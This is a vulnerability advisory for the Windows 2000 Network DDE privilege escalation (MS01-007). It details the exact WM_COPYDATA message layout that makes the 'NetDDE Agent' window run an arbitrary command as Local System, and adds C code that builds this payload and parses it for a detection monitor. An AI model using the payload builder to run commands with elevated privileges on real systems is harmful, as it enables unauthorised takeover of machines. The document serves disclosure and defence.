Title: Microsoft Windows 2000 Network DDE Escalated Privileges Vulnerability
Severity: MODERATE
Description:
The Network DDE (Dynamic Data Exchange) service allows processes to share information across a network. The client and server applications communicate via a channel known as a "trusted share". The record of these shares and their accompanying applications is kept by the Network DDE DSDM (DDE Share Database Manager) service.
The DSDM runs as a service and, when it starts, WINLOGON creates an IPC "window" in the logged-in user's "desktop" named "NetDDE Agent", with a window class of "NDDEAgnt", to be used in communications with DDE-enabled processes. Only processes on the local machine running in the same "window station" and "desktop" can communicate via this "window".
This distinction is not significant for workstations and servers. However, on terminal servers each user session runs in a separate "window station" and none of them can send requests to this "window". Only the console session can send requests to the "window", as it runs in the same "window station" and "desktop".
In previous versions of Windows NT, requests to the "window" were handled in the security context of the logged-in user. In Windows 2000, requests sent to the "window" are handled in the Local System security context, because the handling is done in the WINLOGON process address space.
One of the requests that can be sent to this "window" is one that is likely to be used by the system to start an application when a request is made to a "trusted share" but the application associated with the "trusted share" is not yet running. The application to execute is specified in the request message and is run using the Local System security context. Thus an attacker can start an arbitrary program by sending a request to this "window" with the path and arguments of the application to execute.
The request is sent as a "WM_COPYDATA" window message. The message is sent using the "SendMessage()" function and is handled by the Client/Server Runtime Subsystem (CSRSS); "window" communication is usually performed via the "PostMessage()" function. The structure sent to the "window" has as its first four bytes the magic number 0xDDE1DDE1, followed by the four bytes 0x00000001, followed by another four bytes 0x00000001, followed by the 8-byte DDE share mode ID 0x0100000009000005, followed by four 0xCC filler bytes, followed by the "trusted share" name in ASCII and null terminated, followed by the command to execute in ASCII and null terminated.
A number of trusted shares exist by default in Windows 2000. These are "Chat$", which is associated with the Microsoft Chat application; "CLPBK$", which is associated with the ClipBook application; and "Hearts$", which is associated with the Microsoft Hearts application. If no "trusted shares" exist on the system, an attacker can easily add new ones using the Network DDE Share Manager application.
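The following C code is an added example, not part of the original advisory and not @stake's or Microsoft's code. It lays out the WM_COPYDATA payload exactly as the two paragraphs above describe it (magic number, the two 0x00000001 fields, the 8-byte share mode ID, four 0xCC bytes, then the share name and command as null-terminated ASCII) and pairs the builder with a parser that a host-based monitor could use to recognise such a payload and extract the share name and command before it reaches the "NetDDE Agent" window. It does not call FindWindow() or SendMessage(), so it runs on any platform. Assumptions not stated on the page: all multi-byte fields are written little-endian as an x86 Windows 2000 host would, the 8-byte share mode ID is written as one little-endian 64-bit value, the filler bytes are treated as don't-care when parsing, and the function names, the sample command "notepad.exe" and the buffer sizes are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Field values taken from the advisory text above. */
#define NDDE_MAGIC      0xDDE1DDE1u
#define NDDE_FIELD1     0x00000001u
#define NDDE_FIELD2     0x00000001u
#define NDDE_SHARE_MODE 0x0100000009000005ull  /* assumption: one LE 64-bit value */
#define NDDE_FILLER     0xCCu
#define NDDE_HDR_LEN    24   /* 4 + 4 + 4 + 8 + 4 bytes before the two strings */

static void put_le32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}
static void put_le64(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));
}
static uint32_t get_le32(const uint8_t *p) {
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}
static uint64_t get_le64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Serialise a NetDDE Agent request with the layout described in the advisory.
   Returns the payload length, or 0 if 'out' cannot hold it. */
size_t ndde_build_request(uint8_t *out, size_t cap, const char *share, const char *command)
{
    size_t slen = strlen(share) + 1;     /* include terminating NUL */
    size_t clen = strlen(command) + 1;
    size_t total = NDDE_HDR_LEN + slen + clen;
    if (total > cap) return 0;
    put_le32(out,      NDDE_MAGIC);
    put_le32(out + 4,  NDDE_FIELD1);
    put_le32(out + 8,  NDDE_FIELD2);
    put_le64(out + 12, NDDE_SHARE_MODE);
    memset(out + 20, NDDE_FILLER, 4);    /* four 0xCC filler bytes */
    memcpy(out + 24, share, slen);       /* "trusted share" name, NUL-terminated */
    memcpy(out + 24 + slen, command, clen); /* command to execute, NUL-terminated */
    return total;
}

/* Recognise a candidate payload. Returns 1 and points *share / *command into
   'buf' when the header matches and both strings are NUL-terminated inside the
   buffer; returns 0 otherwise. The filler bytes are not checked (assumption). */
int ndde_parse_request(const uint8_t *buf, size_t len, const char **share, const char **command)
{
    if (len < NDDE_HDR_LEN + 2) return 0;              /* room for two empty strings at least */
    if (get_le32(buf) != NDDE_MAGIC) return 0;
    if (get_le32(buf + 4) != NDDE_FIELD1 || get_le32(buf + 8) != NDDE_FIELD2) return 0;
    if (get_le64(buf + 12) != NDDE_SHARE_MODE) return 0;

    const uint8_t *p = buf + NDDE_HDR_LEN, *end = buf + len;
    const uint8_t *nul = memchr(p, 0, (size_t)(end - p));
    if (!nul) return 0;                                /* share name not terminated */
    *share = (const char *)p;
    p = nul + 1;
    if (p >= end) return 0;                            /* no command string present */
    nul = memchr(p, 0, (size_t)(end - p));
    if (!nul) return 0;                                /* command not terminated */
    *command = (const char *)p;
    return 1;
}

int main(void)
{
    uint8_t buf[256];
    /* Constructed sample: the default "Chat$" share named in the advisory. */
    size_t n = ndde_build_request(buf, sizeof buf, "Chat$", "notepad.exe");
    for (size_t i = 0; i < n; i++) printf("%02X%c", buf[i], (i % 16 == 15) ? '\n' : ' ');
    putchar('\n');
    const char *share, *command;
    if (ndde_parse_request(buf, n, &share, &command))
        printf("NetDDE Agent request: share=\"%s\" command=\"%s\"\n", share, command);
    return 0;
}
```

The parser deliberately refuses a payload whose command string runs off the end of the buffer, which is the case a monitor hooking WM_COPYDATA has to handle, since COPYDATASTRUCT.cbData is attacker-controlled and must never be trusted to cover the strings.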
Affected Products:
- Avaya DefinityOne Media Servers
- Avaya IP600 Media Servers
- Avaya S3400 Message Application Server
- Avaya S8100 Media Servers
- Citrix MetaFrame 0.0.0
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server SP1
References:
- @stake: NetDDE Message Vulnerability
- Microsoft: Microsoft Security Bulletin (MS01-007)
- Microsoft: Microsoft Security Bulletin (MS01-007): Frequently Asked Questions